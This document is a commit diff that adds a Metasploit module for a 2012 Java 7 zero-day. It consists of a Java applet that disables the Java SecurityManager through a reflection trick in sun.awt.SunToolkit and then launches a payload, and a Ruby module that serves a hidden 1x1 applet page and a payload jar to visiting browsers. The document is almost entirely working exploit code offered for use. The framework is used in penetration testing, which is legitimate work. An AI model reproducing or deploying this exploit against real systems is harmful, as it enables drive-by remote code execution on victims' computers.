Added java_jre17_exec

external/source/exploits/CVE-2012-XXXX/Exploit.java

@@ -0,0 +1,75 @@
+//
+// CVE-2012-XXXX Java 0day
+//
+// reported here: http://blog.fireeye.com/research/2012/08/zero-day-season-is-not-over-yet.html
+
+import java.applet.Applet;
+import java.awt.Graphics;
+import java.beans.Expression;
+import java.beans.Statement;
+import java.lang.reflect.Field;
+import java.net.URL;
+import java.security.*;
+import java.security.cert.Certificate;
+import metasploit.Payload;
+
+public class Exploit extends Applet
+{
+
+    public Exploit()
+    {
+    }
+
+    public void disableSecurity()
+        throws Throwable
+    {
+        Statement localStatement = new Statement(System.class, "setSecurityManager", new Object[1]);
+        Permissions localPermissions = new Permissions();
+        localPermissions.add(new AllPermission());
+        ProtectionDomain localProtectionDomain = new ProtectionDomain(new CodeSource(new URL("file:///"), new Certificate[0]), localPermissions);
+        AccessControlContext localAccessControlContext = new AccessControlContext(new ProtectionDomain[] {
+            localProtectionDomain
+        });
+        SetField(Statement.class, "acc", localStatement, localAccessControlContext);
+        localStatement.execute();
+    }
+
+    private Class GetClass(String paramString)
+        throws Throwable
+    {
+        Object arrayOfObject[] = new Object[1];
+        arrayOfObject[0] = paramString;
+        Expression localExpression = new Expression(Class.class, "forName", arrayOfObject);
+        localExpression.execute();
+        return (Class)localExpression.getValue();
+    }
+
+    private void SetField(Class paramClass, String paramString, Object paramObject1, Object paramObject2)
+        throws Throwable
+    {
+        Object arrayOfObject[] = new Object[2];
+        arrayOfObject[0] = paramClass;
+        arrayOfObject[1] = paramString;
+        Expression localExpression = new Expression(GetClass("sun.awt.SunToolkit"), "getField", arrayOfObject);
+        localExpression.execute();
+        ((Field)localExpression.getValue()).set(paramObject1, paramObject2);
+    }
+
+    public void init()
+    {
+        try
+        {
+            disableSecurity();
+			Payload.main(null);               
+        }
+        catch(Throwable localThrowable)
+        {
+            localThrowable.printStackTrace();
+        }
+    }
+
+    public void paint(Graphics paramGraphics)
+    {
+        paramGraphics.drawString("Loading", 50, 25);
+    }
+}

modules/exploits/multi/browser/java_jre17_exec.rb

@@ -0,0 +1,118 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+require 'msf/core'
+require 'rex'
+
+class Metasploit3 < Msf::Exploit::Remote
+	Rank = ExcellentRanking
+
+	include Msf::Exploit::Remote::HttpServer::HTML
+
+	include Msf::Exploit::Remote::BrowserAutopwn
+	autopwn_info({ :javascript => false })
+
+	def initialize( info = {} )
+		super( update_info( info,
+			'Name'          => 'Java 7 Applet Remote Code Execution',
+			'Description'   => %q{
+					This module exploits a vulnerability in Java 7, which allows an attacker to run arbitrary
+				Java code outside the sandbox. This flaw is also being exploited in the wild, and there is
+				no patch from Oracle at this point. The exploit has been tested to work against: IE, Chrome
+				and	Firefox across different platforms.
+			},
+			'License'       => MSF_LICENSE,
+			'Author'        =>
+				[
+					'Unknown', # Vulnerability Discovery
+					'jduck', # metasploit module
+					'sinn3r', # metasploit module
+					'juan vazquez', # metasploit module
+				],
+			'References'    =>
+				[
+					#[ 'CVE', '' ],
+					#[ 'OSVDB', '' ],
+					[ 'URL', 'http://blog.fireeye.com/research/2012/08/zero-day-season-is-not-over-yet.html' ],
+					[ 'URL', 'http://www.deependresearch.org/2012/08/java-7-0-day-vulnerability-information.html' ]
+				],
+			'Platform'      => [ 'java', 'win', 'linux' ],
+			'Payload'       => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },
+			'Targets'       =>
+				[
+					[ 'Generic (Java Payload)',
+						{
+							'Arch' => ARCH_JAVA,
+						}
+					],
+					[ 'Windows Universal',
+						{
+							'Arch' => ARCH_X86,
+							'Platform' => 'win'
+						}
+					],
+					[ 'Linux x86',
+						{
+							'Arch' => ARCH_X86,
+							'Platform' => 'linux'
+						}
+					]
+				],
+			'DefaultTarget'  => 0,
+			'DisclosureDate' => 'Aug 26 2012'
+			))
+	end
+
+
+	def on_request_uri( cli, request )
+		if not request.uri.match(/\.jar$/i)
+			if not request.uri.match(/\/$/)
+				send_redirect(cli, get_resource() + '/', '')
+				return
+			end
+
+			print_status("#{self.name} handling request")
+
+			send_response_html( cli, generate_html, { 'Content-Type' => 'text/html' } )
+			return
+		end
+
+		paths = [
+			[ "Exploit.class" ]
+		]
+
+		p = regenerate_payload(cli)
+
+		jar  = p.encoded_jar
+		paths.each do |path|
+			1.upto(path.length - 1) do |idx|
+				full = path[0,idx].join("/") + "/"
+				if !(jar.entries.map{|e|e.name}.include?(full))
+					jar.add_file(full, '')
+				end
+			end
+			fd = File.open(File.join( Msf::Config.install_root, "data", "exploits", "CVE-2012-XXXX", path ), "rb")
+			data = fd.read(fd.stat.size)
+			jar.add_file(path.join("/"), data)
+			fd.close
+		end
+
+		print_status("Sending Applet.jar")
+		send_response( cli, jar.pack, { 'Content-Type' => "application/octet-stream" } )
+
+		handler( cli )
+	end
+
+	def generate_html
+		html  = "<html><head></head>"
+		html += "<body>"
+		html += "<applet archive=\"Exploit.jar\" code=\"Exploit.class\" width=\"1\" height=\"1\">"
+		html += "</applet></body></html>"
+		return html
+	end
+
+end